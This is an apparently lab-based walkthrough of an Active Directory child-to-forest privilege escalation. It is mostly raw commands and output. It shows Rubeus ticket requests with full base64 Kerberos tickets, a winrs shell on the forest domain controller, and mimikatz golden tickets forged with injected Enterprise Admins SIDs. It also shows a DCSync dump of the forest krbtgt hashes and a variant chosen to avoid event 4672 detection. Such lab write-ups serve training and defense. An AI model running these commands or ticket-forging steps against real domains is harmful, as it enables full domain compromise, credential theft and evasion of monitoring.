FrSxklBWEkVzXJeyVG/nwFoP76B+guJ/B0vGYXeAgm+A5FDeKt6apTT+RNUJrHJZgJzh+n37G5iZOoGn
ET7E5LvXDs+dN7m9EgpeuNBpkjMGShoqiaPai5c0+oOJWzbpQoTuszga6v7RVssRNLXyGmMlGwIgMA4a
SBh6wtqjggEHMIIBA6ADAgEAooH7BIH4fYH1MIHyoIHvMIHsMIHpoCswKaADAgESoSIEIC6UX87t2r+N
6Rbw6xaWqLf3OgJA1lJoi0TCcJiD6fh7oRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMohowGKAD
AgEBoREwDxsNQWRtaW5pc3RyYXRvcqMHAwUAQKUAAKURGA8yMDI0MDcwNDE3MzYyNlqmERgPMjAyNDA3
MDUwMzMzMjFapxEYDzIwMjQwNzExMTczMzIxWqgRGw9NT05FWUNPUlAuTE9DQUypKzApoAMCAQKhIjAg
GwRob3N0GxhtY29ycC1kYy5tb25leWNvcnAubG9jYWw=

ServiceName : host/mcorp-dc.moneycorp.local
ServiceRealm : MONEYCORP.LOCAL
UserName : Administrator
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 7/4/2024 10:36:26 AM
EndTime : 7/4/2024 8:33:21 PM
RenewTill : 7/11/2024 10:33:21 AM
Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable,
forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : LpRfzu3av43pFvDrFpaot/c6AkDWUmiLRMJwmIPp+Hs=

C:\Windows\system32>C:\Ad\Tools\Rubeus.exe asktgs
/ticket:doIGPjCCBjqgAwIBBaEDAgEWooIFCjCCBQZhggUCMIIE/qADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ
0FMoi8wLaADAgECoSYwJBsGa3JidGd0GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKOCBKYwggSioAMCARehAwIBA6KCBJ
QEggSQsTmYQYF3V25z3NMU3E+6o9jfABYQ8cEmNW3js6KS4EXzULpR5xlokVpHbCxwBapPL6qqLRgLnOmLjuo7wXnv2a8kBEv
YzbZ5nLFgXUK8crz9fBV557iK5pM2/rH70WU5ywoSKZ4T8s1PFKH+9+yN2IpVXeQQ6tARrvPfnnalrQOEhpGetwP6qKnP6w5p
oiSNeaDtG2SWn/Zv65x92QLZYAV8gltaVErY19jQcLrXthDVBGhywbe2WoqqGrh3k+OFXd1MjVhh1Jnjs0tWNwPZRAayKHgny
dchvm0jcNeP2ComUeXwXMpFGS0/ftaQbpJX4X24CNKcipWPPlSmhnwSGydKiAII7AHB9DLfj2MBKCNNnkNRfgtOnS70hAoLlK
ADBpWnpVsleuUppKmAATMaBYxyxOrEnH3G92mEeEUFer32Oz6+R7Leh6kSnneRlhP1VfOlh/pRpBzzAx+zb94uafWIEYzK192
qUcofrngVSf37yUwNejUNTUwVu03FLiO39A5C+JgR19MFMKqxnpnCk1pL5OGOHJWpF7WkXHklCqtDnk5PfwkqXS4SXlgTLGGE
VveFyB7q2aCOnlLvZDxwGCH1bYvLgly4QR8BNeaeXwjeD/u+8AS3D++FgRoZklOVIUsXietZv+010ItHRDyg3Gsn3m2ibN6/i
AaQE18sCv1DoagOM6/Tb5RaHZeyJNvZ9pHb4z3Y273P2WXVVfyuYEI4SPUvG+Vfo/KrC3XIR95+G5AOB1OPDDaLT+040yAFr3
fOt1Jju5r1fDQvIK4k0TIKTnV1cqJ5Bl/GTiyELlKpPGGe98h3Twfk1EKtA5v6PMVhyxpiBrbf7UWAarpRTOP3iJzGffpDnvK
eXQedsvKBfKNvNXpj2ZMSvtr/Q2u2clZgaFeI078XO6A2V4XKCzSPEsYbEFGYZm+NGGrnnMwcJCRNL8vDaCQ3AeMuVQf6qAJ7
CxriVS9LTaBkQ4E4ApXTBONitEkTRkVOoGSv7uabxbs+emq9Q78ouojLIuu0z2EhgUf6c0YPbzaLHaWorGnnpVyLQNJ6Um0uJ
P+k7JRuNNxOaV6C4nIQljsk9goxIAi2sZzUYdBn3y5NzpINmF07kGw8Ohjt3uTxeCVNTY9famCXTlRqYEmiVOCdgVCZku3DK0
Ea5AoJj+J6r2niO4LmmIN90Mo3OvcnrAwQdIAHaSA+keR+bPaIyZ4QBeTesqyP0U7/sGdMlUkNl5KAyFXrV3p1r09Cc3hgGtM
DncaVWf1pbyn68hHMjp8sSDy/TGby7+5qnJFvxJNl2T1Ej+SVu3wvhjdj6jTS6ZTLaTODpPsgJtHPQZSBsW1rT1Ja9at6mzE3
l2Nk1ZW+kDzY7ZKL3p2wgqhER8QQGB4GMo5sGiUaMxx7FQ0pQICgZg78/GbbsELDWGGA1ska1KyyRkLzmGSFiPp0dPk0lNgG9
8t3Dus/0RQpER4VbLUD/7ce1j10v4g6+UAQaSIqemT0tfnE8Mikge3EckVD3naxXACocIwHg60FL6Hk5jNVlfVSu5EFOlFli5
JOl7yu5rFda6OCAR4wggEaoAMCAQCiggERBIIBDX2CAQkwggEFoIIBATCB/jCB+6AbMBmgAwIBF6ESBBCDcd1aAZC6JK9PtVu
VO/XioRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMohowGKADAgEBoREwDxsNQWRtaW5pc3RyYXRvcqMHAwUAQKAAAKQR
GA8yMDI0MDcwNDE3MzMyMVqlERgPMjAyNDA3MDQxNzMzMjFaphEYDzIwMjQwNzA1MDMzMzIxWqcRGA8yMDI0MDcxMTE3MzMyM
VqoHBsaRE9MTEFSQ09SUC5NT05FWUNPUlAuTE9DQUypLzAtoAMCAQKhJjAkGwZrcmJ0Z3QbGkRPTExBUkNPUlAuTU9ORVlDT1
JQLkxPQ0FM /service:rpcss/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Ask TGS

[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building TGS-REQ request for: 'rpcss/mcorp-dc.moneycorp.local'
[*] Using domain controller: mcorp-dc.moneycorp.local (172.16.1.1)
[+] TGS request successful!
[+] Ticket successfully imported!
[*] base64(ticket.kirbi):

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

ServiceName : rpcss/mcorp-dc.moneycorp.local
ServiceRealm : MONEYCORP.LOCAL
UserName : Administrator
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
 StartTime : 7/4/2024 10:36:50 AM
EndTime : 7/4/2024 8:33:21 PM
RenewTill : 7/11/2024 10:33:21 AM
Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable,
forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : PfsKCylqBH69NmHEJTpbi8nOtPpH4jA6dgwbVXeukKM=

C:\Windows\system32>C:\Ad\Tools\Rubeus.exe asktgs
/ticket:doIGPjCCBjqgAwIBBaEDAgEWooIFCjCCBQZhggUCMIIE/qADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ
0FMoi8wLaADAgECoSYwJBsGa3JidGd0GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKOCBKYwggSioAMCARehAwIBA6KCBJ
QEggSQsTmYQYF3V25z3NMU3E+6o9jfABYQ8cEmNW3js6KS4EXzULpR5xlokVpHbCxwBapPL6qqLRgLnOmLjuo7wXnv2a8kBEv
YzbZ5nLFgXUK8crz9fBV557iK5pM2/rH70WU5ywoSKZ4T8s1PFKH+9+yN2IpVXeQQ6tARrvPfnnalrQOEhpGetwP6qKnP6w5p
oiSNeaDtG2SWn/Zv65x92QLZYAV8gltaVErY19jQcLrXthDVBGhywbe2WoqqGrh3k+OFXd1MjVhh1Jnjs0tWNwPZRAayKHgny
dchvm0jcNeP2ComUeXwXMpFGS0/ftaQbpJX4X24CNKcipWPPlSmhnwSGydKiAII7AHB9DLfj2MBKCNNnkNRfgtOnS70hAoLlK
ADBpWnpVsleuUppKmAATMaBYxyxOrEnH3G92mEeEUFer32Oz6+R7Leh6kSnneRlhP1VfOlh/pRpBzzAx+zb94uafWIEYzK192
qUcofrngVSf37yUwNejUNTUwVu03FLiO39A5C+JgR19MFMKqxnpnCk1pL5OGOHJWpF7WkXHklCqtDnk5PfwkqXS4SXlgTLGGE
VveFyB7q2aCOnlLvZDxwGCH1bYvLgly4QR8BNeaeXwjeD/u+8AS3D++FgRoZklOVIUsXietZv+010ItHRDyg3Gsn3m2ibN6/i
AaQE18sCv1DoagOM6/Tb5RaHZeyJNvZ9pHb4z3Y273P2WXVVfyuYEI4SPUvG+Vfo/KrC3XIR95+G5AOB1OPDDaLT+040yAFr3
fOt1Jju5r1fDQvIK4k0TIKTnV1cqJ5Bl/GTiyELlKpPGGe98h3Twfk1EKtA5v6PMVhyxpiBrbf7UWAarpRTOP3iJzGffpDnvK
eXQedsvKBfKNvNXpj2ZMSvtr/Q2u2clZgaFeI078XO6A2V4XKCzSPEsYbEFGYZm+NGGrnnMwcJCRNL8vDaCQ3AeMuVQf6qAJ7
CxriVS9LTaBkQ4E4ApXTBONitEkTRkVOoGSv7uabxbs+emq9Q78ouojLIuu0z2EhgUf6c0YPbzaLHaWorGnnpVyLQNJ6Um0uJ
P+k7JRuNNxOaV6C4nIQljsk9goxIAi2sZzUYdBn3y5NzpINmF07kGw8Ohjt3uTxeCVNTY9famCXTlRqYEmiVOCdgVCZku3DK0
Ea5AoJj+J6r2niO4LmmIN90Mo3OvcnrAwQdIAHaSA+keR+bPaIyZ4QBeTesqyP0U7/sGdMlUkNl5KAyFXrV3p1r09Cc3hgGtM
DncaVWf1pbyn68hHMjp8sSDy/TGby7+5qnJFvxJNl2T1Ej+SVu3wvhjdj6jTS6ZTLaTODpPsgJtHPQZSBsW1rT1Ja9at6mzE3
l2Nk1ZW+kDzY7ZKL3p2wgqhER8QQGB4GMo5sGiUaMxx7FQ0pQICgZg78/GbbsELDWGGA1ska1KyyRkLzmGSFiPp0dPk0lNgG9
8t3Dus/0RQpER4VbLUD/7ce1j10v4g6+UAQaSIqemT0tfnE8Mikge3EckVD3naxXACocIwHg60FL6Hk5jNVlfVSu5EFOlFli5
JOl7yu5rFda6OCAR4wggEaoAMCAQCiggERBIIBDX2CAQkwggEFoIIBATCB/jCB+6AbMBmgAwIBF6ESBBCDcd1aAZC6JK9PtVu
VO/XioRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMohowGKADAgEBoREwDxsNQWRtaW5pc3RyYXRvcqMHAwUAQKAAAKQR
GA8yMDI0MDcwNDE3MzMyMVqlERgPMjAyNDA3MDQxNzMzMjFaphEYDzIwMjQwNzA1MDMzMzIxWqcRGA8yMDI0MDcxMTE3MzMyM
VqoHBsaRE9MTEFSQ09SUC5NT05FWUNPUlAuTE9DQUypLzAtoAMCAQKhJjAkGwZrcmJ0Z3QbGkRPTExBUkNPUlAuTU9ORVlDT1
JQLkxPQ0FM /service:http/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Ask TGS

[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building TGS-REQ request for: 'http/mcorp-dc.moneycorp.local'
[*] Using domain controller: mcorp-dc.moneycorp.local (172.16.1.1)
[+] TGS request successful!
[+] Ticket successfully imported!
[*] base64(ticket.kirbi):

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

ServiceName : http/mcorp-dc.moneycorp.local
ServiceRealm : MONEYCORP.LOCAL
UserName : Administrator
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 7/4/2024 10:37:11 AM
EndTime : 7/4/2024 8:33:21 PM
RenewTill : 7/11/2024 10:33:21 AM
Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable,
forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : 38/LueR+crP3CFbfzqG4IwMrgUgbcD5b/DC4k02W6OE=

C:\Windows\system32>winrs -r:mcorp-dc.moneycorp.local cmd.exe

Microsoft Windows [Version 10.0.20348.2227]
(c) Microsoft Corporation. All rights reserved.

C:\Users\Administrator.dcorp>set username
set username
USERNAME=Administrator

C:\Users\Administrator.dcorp>set computername
set computername
COMPUTERNAME=MCORP-DC

C:\Users\Administrator.dcorp>whoami
whoami
dcorp\administrator

Privilege escalation to Enterprise Admins using krbtgt

Here we inject the Enterprise Domains SID of the forest to the SID History of the domain administrator of
the child domain. For this we need the hash of the child domain’s krbtgt account and Domain SIDs of both
the child and the root domain.
Using BetterSafetyKatz.exe
C:\Windows\system32>C:\AD\Tools\old_tools\BetterSafetyKatz.exe "kerberos::golden
/user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-
3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519
/aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /ptt" "exit"
[+] Stolen from @harmj0y, @TheRealWover, @cobbr_io and @gentilkiwi, repurposed by @Flangvik and
@Mrtn9
[+] Randomizing strings in memory
[+] Suicide burn before CreateThread!

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51

.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local

/sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519
/aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /ptt
User : Administrator
Domain : dollarcorp.moneycorp.local (DOLLARCORP)
SID : S-1-5-21-719815819-3726368948-3917688648
User Id : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-335606122-960912869-3279953914-519 ;
ServiceKey: 154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 - aes256_hmac
Lifetime : 7/4/2024 11:00:40 AM ; 7/2/2034 11:00:40 AM ; 7/2/2034 11:00:40 AM
-> Ticket : ** Pass The Ticket **

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated

Golden ticket for 'Administrator @ dollarcorp.moneycorp.local' successfully submitted for current

session

mimikatz(commandline) # exit
Bye!

C:\Windows\system32>klist

Current LogonId is 0:0x16159e5

Cached Tickets: (1)

#0> Client: Administrator @ dollarcorp.moneycorp.local

Server: krbtgt/dollarcorp.moneycorp.local @ dollarcorp.moneycorp.local
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
Start Time: 7/4/2024 11:00:40 (local)
End Time: 7/2/2034 11:00:40 (local)
Renew Time: 7/2/2034 11:00:40 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x1 -> PRIMARY
Kdc Called:
Now we will execute DCSync attack on the forest to obtain the hashes of the krbtgt account of the forest
root.
C:\Windows\system32>"C:\AD\Tools\Old_Tools\SafetyKatz.exe" "lsadump::dcsync /user:mcorp\krbtgt
/domain:moneycorp.local" "exit"

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51

.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # lsadump::dcsync /user:mcorp\krbtgt /domain:moneycorp.local

[DC] 'moneycorp.local' will be the domain
[DC] 'mcorp-dc.moneycorp.local' will be the DC server
[DC] 'mcorp\krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN : krbtgt

** SAM ACCOUNT **

SAM Username : krbtgt

Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 11/11/2022 10:46:24 PM
Object Security ID : S-1-5-21-335606122-960912869-3279953914-502
Object Relative ID : 502

Credentials:
Hash NTLM: a0981492d5dfab1ae0b97b51ea895ddf
ntlm- 0: a0981492d5dfab1ae0b97b51ea895ddf
lm - 0: 87836055143ad5a507de2aaeb9000361

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 7c7a5135513110d108390ee6c322423f

* Primary:Kerberos-Newer-Keys *
Default Salt : MONEYCORP.LOCALkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 90ec02cc0396de7e08c7d5a163c21fd59fcb9f8163254f9775fc2604b9aedb5e
aes128_hmac (4096) : 801bb69b81ef9283f280b97383288442
des_cbc_md5 (4096) : c20dc80d51f7abd9

* Primary:Kerberos *
Default Salt : MONEYCORP.LOCALkrbtgt
Credentials
des_cbc_md5 : c20dc80d51f7abd9

* Packages *
NTLM-Strong-NTOWF

* Primary:WDigest *
01 49fec950691bbeba1b0d33d5a48d0293
 02 0b0c4dbc527ee3154877e070d043cd0d
03 987346e7f810d2b616da385b0c2549ec
04 49fec950691bbeba1b0d33d5a48d0293
05 0b0c4dbc527ee3154877e070d043cd0d
06 333eda93ecfba8d60c57be7f59b14c62
07 49fec950691bbeba1b0d33d5a48d0293
08 cdf2b153a374773dc94ee74d14610428
09 cdf2b153a374773dc94ee74d14610428
10 a6687f8a2a0a6dfd7c054d63c0568e61
11 3cf736e35d2a54f1b0c3345005d3f962
12 cdf2b153a374773dc94ee74d14610428
13 50f935f7e1b88f89fba60ed23c8d115c
14 3cf736e35d2a54f1b0c3345005d3f962
15 06c616b2109569ddd69c8fc00c6a413c
16 06c616b2109569ddd69c8fc00c6a413c
17 179b9c2fd5a34cbb6013df534bf05726
18 5f217f838649436f34bbf13ccb127f44
19 3564c9de46ad690b83268cde43c21854
20 1caa9da91c85a1e176fb85cdefc57587
21 27b7de3c5a16e7629659152656022831
22 27b7de3c5a16e7629659152656022831
23 65f5f95db76e43bd6c4ad216b7577604
24 026c59a45699b631621233cb38733174
25 026c59a45699b631621233cb38733174
26 342a52ec1d3b39d90af55460bcda72e8
27 ef1e1a688748f79d16e8e32318f51465
28 9e93ee8e0bcccb1451face3dba22cc69
29 480da975c1dfc76717a63edc6bb29d7b

mimikatz(commandline) # exit
Bye!

This attack is very noisy and it generates the events 4624, 4634 and 4672 as well. Event ID 4672 from a
domain administrator of a child domain to the domain controller of the parent domain is not normal and
hence this attack is identified very easily.

Instead of accessing the forest DC as an administrator of Child domain DC, we access the forest DC as a
domain controller. For this we inject the Domain Controllers and the Enterprise Domain Controllers to the
SID history and then we run the dc-sync attack on the forest Domain controller.
C:\Windows\system32>C:\AD\Tools\old_tools\BetterSafetyKatz.exe "kerberos::golden
/user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-
3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-516,S-1-5-9
/aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /ptt" "exit"
[+] Stolen from @harmj0y, @TheRealWover, @cobbr_io and @gentilkiwi, repurposed by @Flangvik and
@Mrtn9
[+] Randomizing strings in memory
[+] Suicide burn before CreateThread!

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51

.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local
/sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-
516,S-1-5-9 /aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /ptt
User : Administrator
Domain : dollarcorp.moneycorp.local (DOLLARCORP)
SID : S-1-5-21-719815819-3726368948-3917688648
User Id : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-335606122-960912869-3279953914-516 ; S-1-5-9 ;
ServiceKey: 154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 - aes256_hmac
Lifetime : 7/4/2024 11:08:10 AM ; 7/2/2034 11:08:10 AM ; 7/2/2034 11:08:10 AM
-> Ticket : ** Pass The Ticket **

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated

Golden ticket for 'Administrator @ dollarcorp.moneycorp.local' successfully submitted for current

session

